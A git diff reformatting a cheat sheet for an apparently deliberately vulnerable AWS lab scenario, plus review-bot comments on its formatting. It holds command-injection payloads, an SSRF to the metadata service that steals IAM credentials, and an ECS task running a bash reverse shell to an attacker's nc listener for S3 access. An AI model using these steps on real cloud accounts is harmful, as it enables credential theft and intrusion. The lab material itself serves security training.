diff --git a/scenarios/ecs_privesc_evade_protection/cheat_sheet.md b/scenarios/ecs_privesc_evade_protection/cheat_sheet.md index fd7365e6..d3648e9a 100644 --- a/scenarios/ecs_privesc_evade_protection/cheat_sheet.md +++ b/scenarios/ecs_privesc_evade_protection/cheat_sheet.md @@ -4,7 +4,8 @@ Go to `http://` ### Command Injection -``` +```bash +# Command Injection on web. ; aws s3 ls ; aws s3 ls s3:/// ; aws s3 cp s3:///flag.txt . @@ -12,7 +13,8 @@ Go to `http://` ``` ### SSRF -``` + +```bash # SSRF Attack. http:///?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/ @@ -34,11 +36,13 @@ Go to `http://` ### SSRF -``` -http:///?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/ -aws configure --profile attacker -echo "aws_session_token = " >> ~/.aws/credentials -``` +* Using IPv6 to SSRF on web with `http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/` +* Get credentials & using it to your CLI profile. + + ```bash + aws configure --profile attacker + echo "aws_session_token = " >> ~/.aws/credentials + ``` ### Command Injection 
@@ -47,49 +51,96 @@ echo "aws_session_token = " >> ~/.aws/credentials ### For more information -- more information about iam +- more information about iam. -``` -aws sts get-caller-identity -aws iam get-role --role-name -aws iam list-attached-role-policies --role-name -aws iam list-role-policies --role-name -aws iam get-role-policy --role-name --policy-name -aws iam list-roles -``` + ```bash + aws sts get-caller-identity + aws iam list-roles + aws iam get-role --role-name + aws iam list-attached-role-policies --role-name + aws iam list-role-policies --role-name + aws iam get-role-policy --role-name --policy-name + ```` -- more information about ecs +- more information about ecs clusters. -``` -aws ecs list-clusters --region -aws ecs describe-clusters --region --clusters -aws ecs list-container-instances --region --cluster -``` - -### ECS Privesc - -* Attacker prepare revshell at other public ip point with `nc -lvp 4000`. + ```bash + aws ecs list-clusters --region + aws ecs describe-clusters --region --clusters + aws ecs list-container-instances --region --cluster + ``` +- find available vpc subnets. -* And now come back to CLI. + ```bash + aws ec2 describe-subnets --region + ``` -``` -# ECS Task definition with revshell command. -aws ecs register-task-definition --region --family --task-role-arn --network-mode "awsvpc" --cpu 256 --memory 512 --requires-compatibilities "[\"FARGATE\"]" --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp// 0>&1\\\"\"]}]" +### ECS Privesc -# For run-task, find available subnets. -aws ec2 describe-subnets --region - -# Run task. -aws ecs run-task --region --task-definition --cluster --launch-type FARGATE --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"\"]}}" -``` -After a few minutes, the revshell will be connected by container. -Let's do it on revshell. +1. 
Attacker prepare revshell at other public ip point with `nc -lvp 4000`. + +2. And now come back to CLI. + +3. Create an ECS Task Definition JSON File: + + Create a file named task-definition.json and include the following content. + Replace ``, ``, ``, ``, and `` with your actual values. + + ```json + { + "family": "", + "taskRoleArn": "", + "networkMode": "awsvpc", + "cpu": "256", + "memory": "512", + "requiresCompatibilities": ["FARGATE"], + "containerDefinitions": [ + { + "name": "exfil_creds", + "image": "python:latest", + "entryPoint": ["sh", "-c"], + "command": ["/bin/bash -c \\\"bash -i >& /dev/tcp// 0>&1\\\""] + } + ] + } + ``` + +4. Create an ECS Run Task JSON File. + + Create a file named run-task.json and include the following content. Replace `` with the actual values for your setup. + + ```json + { + "launchType": "FARGATE", + "networkConfiguration": { + "awsvpcConfiguration": { + "assignPublicIp": "ENABLED", + "subnets": [""] + } + } + } + ``` + +5. Register Task Definition and Run Task + + Now, you can use the AWS CLI with the JSON files to execute the commands. + + ```bash + # Register task definition + aws ecs register-task-definition --region --cli-input-json file://task-definition.json + + # Run task + aws ecs run-task --region --task-definition --cluster --cli-input-json file://run-task.json + ``` + + After a few minutes, the revshell will be connected by container. + Let's access to s3 on revshell. ### Access S3 -``` -apt-get update -apt-get install awscli +```bash +apt update +apt install awscli aws s3 ls aws s3 ls s3:///
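Review bot: in the `@@ -34,11 +36,13 @@` hunk, the `echo "aws_session_token = " >> ~/.aws/credentials` line appends to the end of the credentials file rather than to the `[attacker]` section, so it only lands under that profile when `attacker` happens to be the last profile in the file; `aws configure set aws_session_token <token> --profile attacker` (with `<token>` as the placeholder) writes it under the intended profile explicitly. The new bullet "Get credentials & using it to your CLI profile." also needs a grammar pass, e.g. "Get the credentials and add them to a CLI profile."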
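Review bot: in the `@@ -47,49 +51,96 @@` hunk, the "more information about iam" code block is closed with four backticks instead of three, which does not match its opener and will break rendering of everything that follows in most Markdown renderers; it should be a plain three-backtick fence like the other blocks. In `task-definition.json`, the `\\\"` sequences in the `command` entry were needed when the definition was an inline shell-quoted string, but in a JSON file they decode to a literal backslash followed by a quote; a JSON string only needs `\"` there. Finally, `apt install awscli` runs non-interactively inside the container, so it should carry `-y` (or keep the previous `apt-get`, whose behaviour is stable for scripts).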